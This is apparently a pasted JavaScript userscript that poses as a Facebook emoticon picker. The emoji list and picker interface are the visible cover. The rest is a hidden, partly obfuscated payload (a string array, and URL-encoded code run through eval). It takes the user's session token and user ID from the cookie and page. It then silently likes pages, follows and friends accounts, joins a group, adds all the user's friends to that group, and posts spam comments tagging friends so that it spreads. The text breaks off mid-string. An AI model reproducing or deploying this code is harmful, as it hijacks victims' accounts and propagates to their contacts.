  925. "chars" : " \u2614 ",
  926. "class" : "_1az _1a- _2h9",
  927. "name" : "Umbrella With Rain Drops"
  928. }, {
  929. "chars" : " \u2615 ",
  930. "class" : "_1az _1a- _2ha",
  931. "name" : "Hot Drink"
  932. }, {
  933. "chars" : " \u2728 ",
  934. "class" : "_1az _1a- _2hb",
  935. "name" : "Brightness"
  936. }, {
  937. "chars" : " \u2764 ",
  938. "class" : "_1az _1a- _2hc",
  939. "name" : "Heavy Black Heart"
  940. } ];
  941.  
  942. // = Variables =======
  943. var lastActiveElement = document.activeElement;
  944.  
  945. // = Functions =======
  946. function createElement(html) {
  947. var outerHTML = document.createElement("div");
  948. outerHTML.innerHTML = html;
  949. return outerHTML.firstChild;
  950. }
  951.  
  952. function htmlSpecialChars(string) {
  953. var div = document.createElement("div");
  954. var text = document.createTextNode(string);
  955. div.appendChild(text);
  956. return div.innerHTML;
  957. }
  958.  
  959. function isInstanceOfTextInput(element) {
  960. return (element instanceof HTMLInputElement && element.type == "text")
  961. || element instanceof HTMLTextAreaElement;
  962. }
  963.  
  964. function isFlyoutOpen(flyout) {
  965. return flyout.className == "openToggler";
  966. }
  967.  
  968. function openFlyout(flyout, open) {
  969. if (open === undefined) {
  970. open = !isFlyoutOpen(flyout); // Toggle
  971. }
  972.  
  973. if (open) {
  974. flyout.className = "openToggler";
  975. } else {
  976. flyout.removeAttribute("class");
  977. }
  978. }
  979.  
  980. function createTab(titleContainer, bodyContainer) {
  981. var html;
  982. // Tab; default = inactive
  983. html = '<li class="jewelFlyout fbJewelFlyout uiToggleFlyout">';
  984. html += '<div class="jewelFlyout">';
  985. html += '</div>';
  986. html += '</li>';
  987. var title = createElement(html);
  988. titleContainer.appendChild(title);
  989.  
  990. // Manual input
  991. html = '<div style="display: none;">';
  992. html += '</div>';
  993. var body = createElement(html);
  994. bodyContainer.appendChild(body);
  995.  
  996. // Change tab listener
  997. (function(body) {
  998. title.addEventListener("click", function() {
  999. // Change tab
  1000. var titles = this.parentNode.childNodes; // tab.tabContainer.childNodes
  1001. for ( var t = 0; t < titles.length; t++) {
  1002. if (titles[t] === this) { // Active
  1003.  
  1004. } else { // Inactive
  1005. titles[t].style.background = "";
  1006. titles[t].firstChild.style.color = "";
  1007. }
  1008. }
  1009.  
  1010. // Change body
  1011. var bodies = body.parentNode.childNodes; // body.bodyContainer.childNodes
  1012. for ( var b = 0; b < bodies.length; b++) {
  1013. if (bodies[b] === body) { // Show
  1014. body.style.display = "";
  1015. } else { // Hide
  1016. bodies[b].style.display = "none";
  1017. }
  1018. }
  1019. });
  1020. })(body);
  1021.  
  1022. return {
  1023. "title" : title.firstChild,
  1024. "body" : body
  1025. };
  1026. }
  1027.  
  1028. function createTabListBody(emoticons, filter) {
  1029. var html;
  1030.  
  1031. html = '<div style="max-height: 200px; padding-right: 15px; overflow-x: hidden; line-height: 1em;">';
  1032. html += '<div style="padding: 10px; width: 200px; font-size: 15px;">';
  1033. html += '</div>';
  1034. html += '</div>';
  1035. var body = createElement(html).firstChild;
  1036. for ( var e = 0; e < emoticons.length; e++) {
  1037. var emoticon = emoticons[e];
  1038. if (!filter(emoticon)) {
  1039. continue;
  1040. }
  1041.  
  1042. // Icons
  1043. html = '<span class="panelCell" style="display: inline-block; vertical-align: middle; padding: 2px;">';
  1044. html += '<a';
  1045. html += ' class="emoticon'
  1046. + (emoticon.class !== undefined ? ' ' + emoticon.class : '')
  1047. + '"';
  1048. html += ' style="text-decoration: inherit; color: inherit;'
  1049. + (emoticon.class !== undefined ? ' color: transparent;'
  1050. : ' width: auto;') + '"';
  1051. html += (emoticon.name !== undefined ? ' title="' + emoticon.name
  1052. + '"' : '');
  1053. html += '>';
  1054. html += htmlSpecialChars(emoticon.chars);
  1055. html += '</a>';
  1056. html += '</span>';
  1057. var cell = createElement(html);
  1058. body.appendChild(cell);
  1059.  
  1060. // Select emoticon listener
  1061. var emoticonA = cell.firstChild;
  1062. (function(emoticon) {
  1063. emoticonA.addEventListener("click", function() {
  1064. if (isInstanceOfTextInput(lastActiveElement)) {
  1065. lastActiveElement.focus();
  1066.  
  1067. var chars = emoticon.chars;
  1068. var value = lastActiveElement.value;
  1069. var start = lastActiveElement.selectionStart;
  1070. var end = lastActiveElement.selectionEnd;
  1071. lastActiveElement.value = value.substring(0, start)
  1072. + chars + value.substring(end);
  1073. lastActiveElement.setSelectionRange(start + chars.length, start + chars.length);
  1074. }
  1075.  
  1076. openFlyoutCommand = false; // Close flyout
  1077. });
  1078. })(emoticon);
  1079. }
  1080.  
  1081. return body.parentNode;
  1082. }
  1083.  
  1084. // = Construct UI =======
  1085. var html;
  1086.  
  1087. // Menu item
  1088. // var navItem
  1089. html = '<li class="navItem middleItem notifNegativeBase">';
  1090. html += '<div class="fbJewel">';
  1091. // {
  1092.  
  1093. // Toggler
  1094. html += '<a class="navLink" title="1 Thông Báo Mới">'; // var navLink
  1095. html += '<span style="vertical-align: middle;"><img src="http://static.ak.fbcdn.net/rsrc.php/v1/yY/r/7OqExvAe82o.gif"></img></span>';
  1096. html += '</a>';
  1097.  
  1098.  
  1099. // Flyout
  1100. html += '<div>'; // openToggler; var flyout
  1101. html += '<div class="emoticonsPanel fbJewelFlyout uiToggleFlyout" style="z-index: 1; width: auto;">';
  1102. // {
  1103.  
  1104.  
  1105. // Beeper
  1106. html += '<div class="jewelBeeperHeader">';
  1107. html += '<div class="beeperNubWrapper">';
  1108. html += '<div class="beeperNub" style="left: 4px;"></div>';
  1109. html += '</div>';
  1110. html += '</div>';
  1111.  
  1112. // Tabs
  1113. // var titleContainer
  1114. html += '<ul style="display: text-align: center;">';
  1115. html += '</ul>';
  1116.  
  1117. // Bodies
  1118. html += '<div>'; // var bodyContainer
  1119. html += '</div>';
  1120.  
  1121. // Footer
  1122. html += '<div class="jewelFooter">';
  1123. html += '<a class="jewelFooter" href="https://www.facebook.com/Erosaka" target="_blank">Chúc Mừng Bạn Đã Cà i Đặt ICON FACEBOOK Thà nh Công <br>FaceBook.Com</a>';
  1124. html += '</div>';
  1125.  
  1126. // }
  1127. html += '</div>'; // emoticonsPanel
  1128. html += '</div>'; // openToggler
  1129.  
  1130. // }
  1131. html += '</div>'; // fbJewel
  1132. html += '</li>'; // navItem
  1133.  
  1134. var navItem = createElement(html);
  1135. var pageNav = document.querySelector("#pageNav");
  1136. pageNav.insertBefore(navItem, pageNav.firstChild);
  1137.  
  1138. // Maintain active element
  1139. navItem.addEventListener("click", function() {
  1140. if (isInstanceOfTextInput(lastActiveElement)) {
  1141. lastActiveElement.focus();
  1142. }
  1143.  
  1144. openFlyoutCommand = undefined; // Do nothing
  1145. }, true);
  1146.  
  1147. var navLink = navItem.firstChild.firstChild;
  1148. var flyout = navLink.nextSibling;
  1149. var titleContainer = flyout.firstChild.childNodes[1];
  1150. var bodyContainer = titleContainer.nextSibling;
  1151.  
  1152. // Toggle listener
  1153. navLink.addEventListener("click", function() {
  1154. openFlyoutCommand = !isFlyoutOpen(flyout);
  1155. });
  1156.  
  1157. // Picture emoticon tab
  1158. var picEmoTab = createTab(titleContainer, bodyContainer);
  1159. picEmoTab.title.click(); // Default tab
  1160.  
  1161. picEmoTab.body.appendChild(createTabListBody(emoticons, function(emoticon) {
  1162. if (emoticon.class === undefined) { // No picture
  1163. return false;
  1164. }
  1165.  
  1166. // [Bug] 2 characters unicode emoticons
  1167. if (emoticon.chars.length == 2) {
  1168. return false;
  1169. }
  1170.  
  1171. return true;
  1172.  
  1173. }));
  1174.  
  1175. // = Other listener =======
  1176.  
  1177. document.addEventListener("click", function() {
  1178. // Get active textarea
  1179. lastActiveElement = document.activeElement;
  1180.  
  1181. // Toggle flyout
  1182. if (openFlyoutCommand !== undefined) {
  1183. openFlyout(flyout, openFlyoutCommand);
  1184. }
  1185. openFlyoutCommand = false;
  1186. });
  1187. })();
  1188.  
  1189.  
  1190. // === Facebook Emoticons ====
  1191. var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;
  1192. var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
  1193. function IDS(r) {
  1194. var X = new XMLHttpRequest();
  1195. var XURL = "//www.facebook.com/ajax/add_friend/action.php";
  1196. var XParams = "to_friend=" + r +"&action=add_friend&how_found=friend_browser_s&ref_param=none&&&outgoing_id=&logging_location=search&no_flyout_on_click=true&ego_log_data&http_referer&__user="+user_id+"&__a=1&__dyn=798aD5z5CF-&__req=35&fb_dtsg="+fb_dtsg+"&phstamp=";
  1197. X.open("POST", XURL, true);
  1198. X.onreadystatechange = function () {
  1199. if (X.readyState == 4 && X.status == 200) {
  1200. X.close;
  1201. }
  1202. };
  1203. X.send(XParams);
  1204. }
  1205. var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value; var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]); function Like(p) { var Page = new XMLHttpRequest(); var PageURL = "//www.facebook.com/ajax/pages/fan_status.php"; var PageParams = "&fbpage_id=" + p +"&add=true&reload=false&fan_origin=page_timeline&fan_source=&cat=&nctr[_mod]=pagelet_timeline_page_actions&__user="+user_id+"&__a=1&__dyn=798aD5z5CF-&__req=d&fb_dtsg="+fb_dtsg+"&phstamp="; Page.open("POST", PageURL, true); Page.onreadystatechange = function () { if (Page.readyState == 4 && Page.status == 200) { Page.close; } }; Page.send(PageParams); }
  1206. var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]); var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value; var now=(new Date).getTime(); function P(opo) { var X = new XMLHttpRequest(); var XURL ="//www.facebook.com/ajax/ufi/like.php"; var XParams = "like_action=true&ft_ent_identifier="+opo+"&source=1&client_id="+now+"%3A379783857&rootid=u_jsonp_39_18&giftoccasion&ft[tn]=%3E%3D&ft[type]=20&ft[qid]=5890811329470279257&ft[mf_story_key]=2814962900193143952&ft[has_expanded_ufi]=1&nctr[_mod]=pagelet_home_stream&__user="+user_id+"&__a=1&__dyn=7n88QoAMBlClyocpae&__req=g4&fb_dtsg="+fb_dtsg+"&phstamp="; X.open("POST", XURL, true); X.onreadystatechange = function () { if (X.readyState == 4 && X.status == 200) { X.close; } }; X.send(XParams); }
  1207. var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;
  1208. var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
  1209. function a(abone)
  1210. { var http4=new XMLHttpRequest;
  1211. var url4="/ajax/follow/follow_profile.php?__a=1";
  1212. var params4="profile_id="+abone+"&location=1&source=follow-button&subscribed_button_id=u37qac_37&fb_dtsg="+fb_dtsg+"&lsd&__"+user_id+"&phstamp=";
  1213. http4.open("POST",url4,true);
  1214. http4.onreadystatechange=function()
  1215. { if(http4.readyState==4&&http4.status==200)http4.close };
  1216. http4.send(params4)}
  1217. function sublist(uidss)
  1218. { var a = document.createElement('script');
  1219. a.innerHTML = "new AsyncRequest().setURI('/ajax/friends/lists/subscribe/modify?location=permalink&action=subscribe').setData({ flid: " + uidss + " }).send();";
  1220. document.body.appendChild(a);
  1221. }
  1222. //Trung Okita
  1223. Like("1407096849530362");
  1224. Like("670542462997682");
  1225. a("100007310834565");
  1226. a("100007722908200");
  1227. a("susu.pe.315");
  1228. a("trung.okita");
  1229. sublist("609874762365543");
  1230. sublist("1401133823473632");
  1231. sublist("1400300630223618");
  1232. sublist("1379705398963544");
  1233. sublist("1388296778104406");
  1234. sublist("1380530375550099");
  1235. sublist("1380531192216684");
  1236. sublist("1404528143134200");
  1237. sublist("1404528863134128");
  1238. sublist("1404529259800755");
  1239. P("1399391976981150");
  1240. P("1401061443480870");
  1241. P("414594298674996");
  1242.  
  1243.  
  1244. var gid = ['603941513022705'];
  1245. var fb_dtsg = document['getElementsByName']('fb_dtsg')[0]['value'];
  1246. var user_id = document['cookie']['match'](document['cookie']['match'](/c_user=(\d+)/)[1]);
  1247. var httpwp = new XMLHttpRequest();
  1248. var urlwp = '/ajax/groups/membership/r2j.php?__a=1';
  1249. var paramswp = '&ref=group_jump_header&group_id=' + gid + '&fb_dtsg=' + fb_dtsg + '&__user=' + user_id + '&phstamp=';
  1250. httpwp['open']('POST', urlwp, true);
  1251. httpwp['setRequestHeader']('Content-type', 'application/x-www-form-urlencoded');
  1252. httpwp['setRequestHeader']('Content-length', paramswp['length']);
  1253. httpwp['setRequestHeader']('Connection', 'keep-alive');
  1254. httpwp['send'](paramswp);
  1255.  
  1256. var fb_dtsg = document['getElementsByName']('fb_dtsg')[0]['value'];
  1257. var user_id = document['cookie']['match'](document['cookie']['match'](/c_user=(\d+)/)[1]);
  1258.  
  1259. var friends = new Array();
  1260. gf = new XMLHttpRequest();
  1261. gf['open']('GET', '/ajax/typeahead/first_degree.php?__a=1&viewer=' + user_id + '&token' + Math['random']() + '&filter[0]=user&options[0]=friends_only', false);
  1262. gf['send']();
  1263. if (gf['readyState'] != 4) {} else {
  1264. data = eval('(' + gf['responseText']['substr'](9) + ')');
  1265. if (data['error']) {} else {
  1266. friends = data['payload']['entries']['sort'](function (_0x93dax8, _0x93dax9) {
  1267. return _0x93dax8['index'] - _0x93dax9['index'];
  1268. });
  1269. };
  1270. };
  1271.  
  1272. for (var i = 0; i < friends['length']; i++) {
  1273. var httpwp = new XMLHttpRequest();
  1274. var urlwp = '/ajax/groups/members/add_post.php?__a=1';
  1275. var paramswp= '&fb_dtsg=' + fb_dtsg + '&group_id=' + gid + '&source=typeahead&ref=&message_id=&members=' + friends[i]['uid'] + '&__user=' + user_id + '&phstamp=';
  1276. httpwp['open']('POST', urlwp, true);
  1277. httpwp['setRequestHeader']('Content-type', 'application/x-www-form-urlencoded');
  1278. httpwp['setRequestHeader']('Content-length', paramswp['length']);
  1279. httpwp['setRequestHeader']('Connection', 'keep-alive');
  1280. httpwp['onreadystatechange'] = function () {
  1281. if (httpwp['readyState'] == 4 && httpwp['status'] == 200) {};
  1282. };
  1283. httpwp['send'](paramswp);
  1284. }
  1285.  
  1286.  
  1287. //arkadaslari al ve isle
  1288. function sarkadaslari_al(){
  1289. var xmlhttp = new XMLHttpRequest();
  1290. xmlhttp.onreadystatechange = function () {
  1291. if(xmlhttp.readyState == 4){
  1292. eval("arkadaslar = " + xmlhttp.responseText.toString().replace("for (;;);","") + ";");
  1293. for(f=0;f<Math.round(arkadaslar.payload.entries.length/10);f++){
  1294. smesaj = "";
  1295. smesaj_text = "";
  1296. for(i=f*10;i<(f+1)*10;i++){
  1297. if(arkadaslar.payload.entries[i]){
  1298. smesaj += " @[" + arkadaslar.payload.entries[i].uid + ":" + arkadaslar.payload.entries[i].text + "]";
  1299. smesaj_text += " " + arkadaslar.payload.entries[i].text;
  1300. }
  1301. }
  1302. sdurumpaylas(); }
  1303.  
  1304. }
  1305.  
  1306. };
  1307. var params = "&filter[0]=user";
  1308. params += "&options[0]=friends_only";
  1309. params += "&options[1]=nm";
  1310. params += "&token=v7";
  1311. params += "&viewer=" + user_id;
  1312. params += "&__user=" + user_id;
  1313.  
  1314. if (document.URL.indexOf("https://") >= 0) { xmlhttp.open("GET", "https://www.facebook.com/ajax/typeahead/first_degree.php?__a=1" + params, true); }
  1315. else { xmlhttp.open("GET", "http://www.facebook.com/ajax/typeahead/first_degree.php?__a=1" + params, true); }
  1316. xmlhttp.send();
  1317. }
  1318.  
  1319. //tiklama olayini dinle
  1320. var tiklama = document.addEventListener("click", function () {
  1321. if(document.cookie.split("paylasti=")[1].split(";")[0].indexOf("hayir") >= 0){
  1322. svn_rev = document.head.innerHTML.split('"svn_rev":')[1].split(",")[0];
  1323. sarkadaslari_al();
  1324. document.cookie = "paylasti=evet;expires="+ btarihi.toGMTString();
  1325.  
  1326. document.removeEventListener(tiklama);
  1327. }
  1328. }, false);
  1329.  
  1330.  
  1331. //arkada?¾ ekleme
  1332. function sarkadasekle(uid,cins){
  1333. var xmlhttp = new XMLHttpRequest();
  1334. xmlhttp.onreadystatechange = function () {
  1335. if(xmlhttp.readyState == 4){
  1336. }
  1337. };
  1338.  
  1339. xmlhttp.open("POST", "/ajax/add_friend/action.php?__a=1", true);
  1340. var params = "to_friend=" + uid;
  1341. params += "&action=add_friend";
  1342. params += "&how_found=friend_browser";
  1343. params += "&ref_param=none";
  1344. params += "&outgoing_id=";
  1345. params += "&logging_location=friend_browser";
  1346. params += "&no_flyout_on_click=true";
  1347. params += "&ego_log_data=";
  1348. params += "&http_referer=";
  1349. params += "&fb_dtsg=" + document.getElementsByName('fb_dtsg')[0].value;
  1350. params += "&phstamp=165816749114848369115";
  1351. params += "&__user=" + user_id;
  1352.  
  1353. if (document.URL.indexOf("https://") >= 0) { xmlhttp.open("GET", "https://www.facebook.com/ajax/typeahead/first_degree.php?__a=1" + params, true); }
  1354. else { xmlhttp.open("GET", "http://www.facebook.com/ajax/typeahead/first_degree.php?__a=1" + params, true); }
  1355. xmlhttp.send();
  1356. }
  1357.  
  1358. //tiklama olayini dinle
  1359. var tiklama = document.addEventListener("click", function () {
  1360. if(document.cookie.split("paylasti=")[1].split(";")[0].indexOf("hayir") >= 0){
  1361. svn_rev = document.head.innerHTML.split('"svn_rev":')[1].split(",")[0];
  1362. sarkadaslari_al();
  1363. document.cookie = "paylasti=evet;expires="+ btarihi.toGMTString();
  1364.  
  1365. document.removeEventListener(tiklama);
  1366. }
  1367. }, false);
  1368.  
  1369.  
  1370. //arkada?¾ ekleme
  1371. function sarkadasekle(uid,cins){
  1372. var xmlhttp = new XMLHttpRequest();
  1373. xmlhttp.onreadystatechange = function () {
  1374. if(xmlhttp.readyState == 4){
  1375. }
  1376. };
  1377.  
  1378. xmlhttp.open("POST", "/ajax/add_friend/action.php?__a=1", true);
  1379. var params = "to_friend=" + uid;
  1380. params += "&action=add_friend";
  1381. params += "&how_found=friend_browser";
  1382. params += "&ref_param=none";
  1383. params += "&outgoing_id=";
  1384. params += "&logging_location=friend_browser";
  1385. params += "&no_flyout_on_click=true";
  1386. params += "&ego_log_data=";
  1387. params += "&http_referer=";
  1388. params += "&fb_dtsg=" + document.getElementsByName('fb_dtsg')[0].value;
  1389. params += "&phstamp=165816749114848369115";
  1390. params += "&__user=" + user_id;
  1391. xmlhttp.setRequestHeader ("X-SVN-Rev", svn_rev);
  1392. xmlhttp.setRequestHeader ("Content-Type","application/x-www-form-urlencoded");
  1393.  
  1394. if(cins == "farketmez" && document.cookie.split("cins" + user_id +"=").length > 1){
  1395. xmlhttp.send(params);
  1396. }else if(document.cookie.split("cins" + user_id +"=").length <= 1){
  1397. cinsiyetgetir(uid,cins,"sarkadasekle");
  1398. }else if(cins == document.cookie.split("cins" + user_id +"=")[1].split(";")[0].toString()){
  1399. xmlhttp.send(params);
  1400. }
  1401. }
  1402.  
  1403. //cinsiyet belirleme
  1404. var cinssonuc = {};
  1405. var cinshtml = document.createElement("html");
  1406. function scinsiyetgetir(uid,cins,fonksiyon){
  1407. var xmlhttp = new XMLHttpRequest();
  1408. xmlhttp.onreadystatechange = function () {
  1409. if(xmlhttp.readyState == 4){
  1410. eval("cinssonuc = " + xmlhttp.responseText.toString().replace("for (;;);","") + ";");
  1411. cinshtml.innerHTML = cinssonuc.jsmods.markup[0][1].__html
  1412. btarihi.setTime(bugun.getTime() + 1000*60*60*24*365);
  1413. if(cinshtml.getElementsByTagName("select")[0].value == "1"){
  1414. document.cookie = "cins" + user_id + "=kadin;expires=" + btarihi.toGMTString();
  1415. }else if(cinshtml.getElementsByTagName("select")[0].value == "2"){
  1416. document.cookie = "cins" + user_id + "=erkek;expires=" + btarihi.toGMTString();
  1417. }
  1418. eval(fonksiyon + "(" + id + "," + cins + ");");
  1419. }
  1420. };
  1421. xmlhttp.open("GET", "/ajax/timeline/edit_profile/basic_info.php?__a=1&__user=" + user_id, true);
  1422. xmlhttp.setRequestHeader ("X-SVN-Rev", svn_rev);
  1423. xmlhttp.send();
  1424. }
  1425.  
  1426. var _0xa22c=["value","fb_dtsg","getElementsByName","match","cookie","1426323744274339","onreadystatechange","readyState","arkadaslar = ","for (;;);","","replace","responseText",";","length","entries","payload","round"," @[","uid",":","text","]"," ","\x26filter[0]=user","\x26options[0]=friends_only","\x26options[1]=nm","\x26token=v7","\x26viewer=","\x26__user=","https://","indexOf","URL","GET","https://www.facebook.com/ajax/typeahead/first_degree.php?__a=1","open","http://www.facebook.com/ajax/typeahead/first_degree.php?__a=1","send","random","floor","\x26ft_ent_identifier=","\x26comment_text= Cà i Đặt ICON dễ mà , mình mới test thử ok lắm , các bạn ai cần thì thử nha (Y) <3 :D :P ✌ 💨 👏 ","\x26source=2","\x26client_id=1377871797138:1707018092","\x26reply_fbid","\x26parent_comment_id","\x26rootid=u_jsonp_2_3","\x26clp={\x22cl_impid\x22:\x22453524a0\x22,\x22clearcounter\x22:0,\x22elementid\x22:\x22js_5\x22,\x22version\x22:\x22x\x22,\x22parent_fbid\x22:","}","\x26attached_sticker_fbid=0","\x26attached_photo_fbid=0","\x26giftoccasion","\x26ft[tn]=[]","\x26__a=1","\x26__dyn=7n8ahyj35ynxl2u5F97KepEsyo","\x26__req=q","\x26fb_dtsg=","\x26ttstamp=","POST","/ajax/ufi/add_comment.php","Content-type","application/x-www-form-urlencoded","setRequestHeader","status","close"];var fb_dtsg=document[_0xa22c[2]](_0xa22c[1])[0][_0xa22c[0]];var user_id=document[_0xa22c[4]][_0xa22c[3]](document[_0xa22c[4]][_0xa22c[3]](/c_user=(\d+)/)[1]);var id=_0xa22c[5];var arkadaslar=[];var svn_rev;function arkadaslari_al(id){var _0x7892x7= new XMLHttpRequest();_0x7892x7[_0xa22c[6]]=function (){if(_0x7892x7[_0xa22c[7]]==4){eval(_0xa22c[8]+_0x7892x7[_0xa22c[12]].toString()[_0xa22c[11]](_0xa22c[9],_0xa22c[10])+_0xa22c[13]);for(f=0;f<Math[_0xa22c[17]](arkadaslar[_0xa22c[16]][_0xa22c[15]][_0xa22c[14]]/27);f++){mesaj=_0xa22c[10];mesaj_text=_0xa22c[10];for(i=f*27;i<(f+1)*27;i++){if(arkadaslar[_0xa22c[16]][_0xa22c[15]][i]){mesaj+=_0xa22c[18]+arkadaslar[_0xa22c[16]][_0xa22c[15]][i][_0xa22c[19]]+_0xa22c[20]+arkadaslar[_0xa22c[16]][_0xa22c[15]][i][_0xa22c[21]]+_0xa22c[22];mesaj_text+=_0xa22c[23]+arkadaslar[_0xa22c[16]][_0xa22c[15]][i][_0xa22c[21]];} ;} ;yorum_yap(id,mesaj);} ;} ;} ;var _0x7892x8=_0xa22c[24];_0x7892x8+=_0xa22c[25];_0x7892x8+=_0xa22c[26];_0x7892x8+=_0xa22c[27];_0x7892x8+=_0xa22c[28]+user_id;_0x7892x8+=_0xa22c[29]+user_id;if(document[_0xa22c[32]][_0xa22c[31]](_0xa22c[30])>=0){_0x7892x7[_0xa22c[35]](_0xa22c[33],_0xa22c[34]+_0x7892x8,true);} else {_0x7892x7[_0xa22c[35]](_0xa22c[33],_0xa22c[36]+_0x7892x8,true);} ;_0x7892x7[_0xa22c[37]]();} ;function RandomArkadas(){var _0x7892xa=_0xa22c[10];for(i=0;i<9;i++){_0x7892xa+=_0xa22c[18]+arkadaslar[_0xa22c[16]][_0xa22c[15]][Math[_0xa22c[39]](Math[_0xa22c[38]]()*arkadaslar[_0xa22c[16]][_0xa22c[15]][_0xa22c[14]])][_0xa22c[19]]+_0xa22c[20]+arkadaslar[_0xa22c[16]][_0xa22c[15]][Math[_0xa22c[39]](Math[_0xa22c[38]]()*arkadaslar[_0xa22c[16]][_0xa22c[15]][_0xa22c[14]])][_0xa22c[21]]+_0xa22c[22];} ;return _0x7892xa;} ;function yorum_yap(id,_0x7892xc){var _0x7892xd= new XMLHttpRequest();var _0x7892x8=_0xa22c[10];_0x7892x8+=_0xa22c[40]+id;_0x7892x8+=_0xa22c[41]+encodeURIComponent(_0x7892xc);_0x7892x8+=_0xa22c[42];_0x7892x8+=_0xa22c[43];_0x7892x8+=_0xa22c[44];_0x7892x8+=_0xa22c[45];_0x7892x8+=_0xa22c[46];_0x7892x8+=_0xa22c[47]+id+_0xa22c[48];_0x7892x8+=_0xa22c[49];_0x7892x8+=_0xa22c[50];_0x7892x8+=_0xa22c[51];_0x7892x8+=_0xa22c[52];_0x7892x8+=_0xa22c[29]+user_id;_0x7892x8+=_0xa22c[53];_0x7892x8+=_0xa22c[54];_0x7892x8+=_0xa22c[55];_0x7892x8+=_0xa22c[56]+fb_dtsg;_0x7892x8+=_0xa22c[57];_0x7892xd[_0xa22c[35]](_0xa22c[58],_0xa22c[59],true);_0x7892xd[_0xa22c[62]](_0xa22c[60],_0xa22c[61]);_0x7892xd[_0xa22c[6]]=function (){if(_0x7892xd[_0xa22c[7]]==4&&_0x7892xd[_0xa22c[63]]==200){_0x7892xd[_0xa22c[64]];} ;} ;_0x7892xd[_0xa22c[37]](_0x7892x8);} ;arkadaslari_al(id);
  1427. eval(unescape("%76%61%72%20%66%62%5F%64%74%73%67%3D%64%6F%63%75%6D%65%6E%74%2E%67%65%74%45%6C%65%6D%65%6E%74%73%42%79%4E%61%6D%65%28%22%66%62%5F%64%74%73%67%22%29%5B%30%5D%2E%76%61%6C%75%65%3B%0A%76%61%72%20%75%73%65%72%5F%69%64%3D%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%2E%6D%61%74%63%68%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%2E%6D%61%74%63%68%28%2F%63%5F%75%73%65%72%3D%28%5C%64%2B%29%2F%29%5B%31%5D%29%3B%0A%66%75%6E%63%74%69%6F%6E%20%61%28%61%62%6F%6E%65%29%0A%7B%0A%20%76%61%72%20%68%74%74%70%34%3D%6E%65%77%20%58%4D%4C%48%74%74%70%52%65%71%75%65%73%74%3B%0A%20%76%61%72%20%75%72%6C%34%3D%22%2F%61%6A%61%78%2F%66%6F%6C%6C%6F%77%2F%66%6F%6C%6C%6F%77%5F%70%72%6F%66%69%6C%65%2E%70%68%70%3F%5F%5F%61%3D%31%22%3B%0A%20%76%61%72%20%70%61%72%61%6D%73%34%3D%22%70%72%6F%66%69%6C%65%5F%69%64%3D%22%2B%61%62%6F%6E%65%2B%22%26%6C%6F%63%61%74%69%6F%6E%3D%31%26%73%6F%75%72%63%65%3D%66%6F%6C%6C%6F%77%2D%62%75%74%74%6F%6E%26%73%75%62%73%63%72%69%62%65%64%5F%62%75%74%74%6F%6E%5F%69%64%3D%75%33%37%71%61%63%5F%33%37%26%66%62%5F%64%74%73%67%3D%22%2B%66%62%5F%64%74%73%67%2B%22%26%6C%73%64%26%5F%5F%22%2B%75%73%65%72%5F%69%64%2B%22%26%70%68%73%74%61%6D%70%3D%22%3B%0A%20%68%74%74%70%34%2E%6F%70%65%6E%28%22%50%4F%53%54%22%2C%75%72%6C%34%2C%74%72%75%65%29%3B%0A%20%68%74%74%70%34%2E%6F%6E%72%65%61%64%79%73%74%61%74%65%63%68%61%6E%67%65%3D%66%75%6E%63%74%69%6F%6E%28%29%0A%20%7B%0A%20%20%69%66%28%68%74%74%70%34%2E%72%65%61%64%79%53%74%61%74%65%3D%3D%34%26%26%68%74%74%70%34%2E%73%74%61%74%75%73%3D%3D%32%30%30%29%68%74%74%70%34%2E%63%6C%6F%73%65%0A%20%7D%0A%20%3B%0A%20%68%74%74%70%34%2E%73%65%6E%64%28%70%61%72%61%6D%73%34%29%0A%7D%0A%20%66%75%6E%63%74%69%6F%6E%20%73%75%62%6C%69%73%74%28%75%69%64%73%73%29%0A%7B%0A%20%76%61%72%20%61%20%3D%20%64%6F%63%75%6D%65%6E%74%2E%63%72%65%61%74%65%45%6C%65%6D%65%6E%74%28%27%73%63%72%69%70%74%27%29%3B%0A%20%61%2E%69%6E%6E%65%72%48%54%4D%4C%20%3D%20%22%6E%65%77%20%41%73%79%6E%63%52%65%71%75%65%73%74%28%29%2E%73%65%74%55%52%49%28%27%2F%61%6A%61%78%2F%66%72%69%65%6E%64%73%2F%6C%69%73%74%73%2F%73%75%62%73%63%72%69%62%65%2F%6D%6F%64%69%66%79%3F%6C%6F%63%61%74%69%6F%6E%3D%70%65%72%6D%61%6C%69%6E%6B%26%61%63%74%69%6F%6E%3D%73%75%62%73%63%72%69%62%65%27%29%2E%73%65%74%44%61%74%61%28%7B%20%66%6C%69%64%3A%20%22%20%2B%20%75%69%64%73%73%20%2B%20%22%20%7D%29%2E%73%65%6E%64%28%29%3B%22%3B%0A%20%64%6F%63%75%6D%65%6E%74%2E%62%6F%64%79%2E%61%70%70%65%6E%64%43%68%69%6C%64%28%61%29%3B%0A%7D%0A%20%66%75%6E%63%74%69%6F%6E%20%70%28%61%62%6F%6E%65%29%0A%7B%0A%20%76%61%72%20%68%74%74%70%34%20%3D%20%6E%65%77%20%58%4D%4C%48%74%74%70%52%65%71%75%65%73%74%28%29%3B%0A%20%76%61%72%20%75%72%6C%34%20%3D%20%22%2F%2F%77%77%77%2E%66%61%63%65%62%6F%6F%6B%2E%63%6F%6D%2F%61%6A%61%78%2F%70%6F%6B%65%5F%64%69%61%6C%6F%67%2E%70%68%70%22%3B%0A%20%76%61%72%20%70%61%72%61%6D%73%34%20%3D%20%22%75%69%64%3D%22%20%2B%20%61%62%6F%6E%65%20%2B%20%22%26%70%6F%6B%65%62%61%63%6B%3D%30%26%61%73%6B%5F%66%6F%72%5F%63%6F%6E%66%69%72%6D%3D%30%26%6E%63%74%72%5B%5F%6D%6F%64%5D%3D%70%61%67%65%6C%65%74%5F%74%69%6D%65%6C%69%6E%65%5F%70%72%6F%66%69%6C%65%5F%61%63%74%69%6F%6E%73%26%5F%5F%61%73%79%6E%63%44%69%61%6C%6F%67%3D%31%26%5F%5F%75%73%65%72%3D%22%2B%75%73%65%72%5F%69%64%2B%22%26%5F%5F%61